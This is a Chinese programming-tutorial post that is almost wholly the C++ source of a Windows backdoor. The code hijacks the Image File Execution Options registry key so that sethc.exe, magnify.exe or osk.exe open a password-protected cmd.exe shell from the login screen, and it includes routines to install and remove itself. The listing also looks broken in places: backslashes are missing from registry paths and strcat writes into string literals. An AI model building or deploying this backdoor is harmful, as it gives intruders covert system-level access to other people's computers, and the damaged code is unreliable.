本文实例讲述了C++映像劫持后门的方法。分享给大家供大家参考。具体如下：

// freeheart.cpp : Defines the entry point for the console application. //学习交流使用，违法使用后果自负。 // by:cnblogs.com/blogg time 2013.5.24 // argv 0 = freeheart.exe // argv 1 = -i // argv 2 = name.exe // argv 3 = 1 2 3 // 此程序使用的映像劫持技术， // 在注册表当中建立一个程序名的项目,在里面使用debugger,然后在里面指向自己的程序。 //[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options] // #include "stdafx.h" #include "windows.h" #include "atlbase.h" #include <iostream> using namespace std; int main(int argc, char* argv[]) { void anzhuang(char *Path,char *filename); void xiezai(char *path,char *hName); void CopyZiji(char *CopyPath); char *password = "free"; //真密码缓冲区 char *shuruPwd = ""; //输入的密码缓冲区 int errorbuff = 0; char *PathBuff = ""; char *FileName = ""; char *chsname = "sethc.exe"; //SHIFT粘贴键程序的名称 char *fangdajing = "magnify.exe"; // char *pingmujianpan = "osk.exe"; // LPTSTR sysbuff; //得到系统路径的缓冲区 TCHAR tchBuffer2[1024]; //申请一个字符变量数组 sysbuff = tchBuffer2; //把系统的路径放到这个变量数组里 if(GetSystemDirectory(sysbuff, MAX_PATH)) //得到系统路径 { sysbuff = strcat(sysbuff,""); //strcat 剪切在一起,把放在系统路径的后面，然后放入系统缓冲区当中。 } if (argv[1] != NULL) { //安装命令判断 if (strcmp(argv[1],"-i") == 0) { if (argv[2] != NULL) { FileName=argv[2]; } else { cout<<"请输入文件名!"; return 0; } if(argv[3] != NULL) { if(strcmp(argv[3],"1") == 0) { anzhuang(FileName,chsname); PathBuff = strcat(sysbuff,FileName); CopyZiji(PathBuff); cout<<"创建完成! : "<<PathBuff<<endl; return 0; } if(strcmp(argv[3],"2") == 0) { anzhuang(FileName,fangdajing); PathBuff = strcat(sysbuff,FileName); CopyZiji(PathBuff); //调用函数 cout<<"创建完成! : "<<PathBuff<<endl; return 0; } if(strcmp(argv[3],"3") == 0) { anzhuang(FileName,pingmujianpan); PathBuff = strcat(sysbuff,FileName); CopyZiji(PathBuff); //调用函数 cout<<"创建完成! : "<<PathBuff<<endl; return 0; } } else { cout<<"请输入参数!"<<endl; } return 0; } //卸载 if (strcmp(argv[1],"-u") == 0) { if(argv[2] != NULL) { if(strcmp(argv[2],"1") == 0) { xiezai(sysbuff,chsname); cout<<"删除文件成功!"<<endl; return 0; } if(strcmp(argv[2],"2") == 0) { xiezai(sysbuff,fangdajing); cout<<"删除文件成功!"<<endl; return 0; } if(strcmp(argv[2],"3") == 0) { xiezai(sysbuff,pingmujianpan); cout<<"删除文件成功!"<<endl; return 0; } } else { cout<<"请输入参数!"<<endl; } return 0; } //为什么会进入这里 因为debugger a.exe 其实是两个参数，因为if (argv[1] != NULL) 也就是第二个参数不等于空的话执行下面的语句。 while(errorbuff<3) //循环三次，错误。 { cout<<"password:"; cin>>shuruPwd; if (strcmp(shuruPwd,password) == 0) { system("cmd.exe"); break; } else { cout<<"密码错误!"<<endl; } errorbuff++; //自加一次 } return 0; } system("color a"); cout<<"-----------------------------------------------------"<<endl; cout<<"欢迎光临自由的心,祝您好运!"<<endl; cout<<"1: sethc.exe Shift后门n"; cout<<"2: magnify.exe 放大镜后门n"; cout<<"3: osk.exe 屏幕键盘后门n"; cout<<"-----------------------------------------------------"<<endl; cout<<"安装: freeheart.exe -i xx.exe 1"<<endl; cout<<"卸载: freeheart.exe -u 1"<<endl; cout<<"连接密码:free"<<endl; cout<<"-----------------------------------------------------"<<endl; return 0; } //安装函数 void anzhuang(char *Path,char *filename) { HKEY hSoftKey = NULL; HKEY hCompanyKey = NULL; if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options"), 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS) { if (RegCreateKeyEx(hSoftKey, _T(filename), 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_WRITE|KEY_READ, NULL,&hCompanyKey,NULL) == ERROR_SUCCESS) { LPBYTE Value=(LPBYTE)Path; long ret1=::RegSetValueEx(hCompanyKey,"Debugger",0,REG_SZ,(BYTE*)Value,50); RegCloseKey(hCompanyKey); } RegCloseKey(hSoftKey); } } //卸载函数 void xiezai(char *path,char *hName) //hName 传递进来的程序名 { HKEY hSoftKey = NULL; LPCTSTR hMainKey="SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options"; if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, hMainKey, 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS) { DWORD len = 256; DWORD type = REG_SZ; LPBYTE last = new BYTE[256]; LPCTSTR hname = (LPCTSTR)hName; char *HHname; HKEY hKey; //在注册表当中创建一个magnify名的项，在里面当中加入debugger,里面跟上自己的程序名的值。 char* DelCom; HHname=strcat((char *)hMainKey,""); //hmainkey 注册表的路径 HHname=strcat((char *)hMainKey,(char *)hname); //hname 程序名 if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)HHname,0,KEY_READ,&hKey)==ERROR_SUCCESS && RegQueryValueEx(hKey,"Debugger",0,&type,last,&len)==ERROR_SUCCESS) { DelCom=strcat(path,reinterpret_cast <char*>(last)); DeleteFile(DelCom); //删除文件 RegDeleteKey(hSoftKey,hname); //删除注册表 } RegCloseKey(hSoftKey); //关闭句柄 RegCloseKey(hKey); //关闭句柄 } } void CopyZiji(char *CopyPath) //将自身生成exe文件复制到指定的路径下 { char PathBuff[MAX_PATH]; //申请一个字符变量数组,大小是系统最大的长度。 GetModuleFileName(NULL,PathBuff,MAX_PATH); //第一个参数为NULL，就表示获取当前程序的路径,第二个参数就是存放到缓冲区。 CopyFile(PathBuff,CopyPath,true); //CurrentPath 是自身exe,把自身复制到目标路径当中 }

希望本文所述对大家的C++程序设计有所帮助。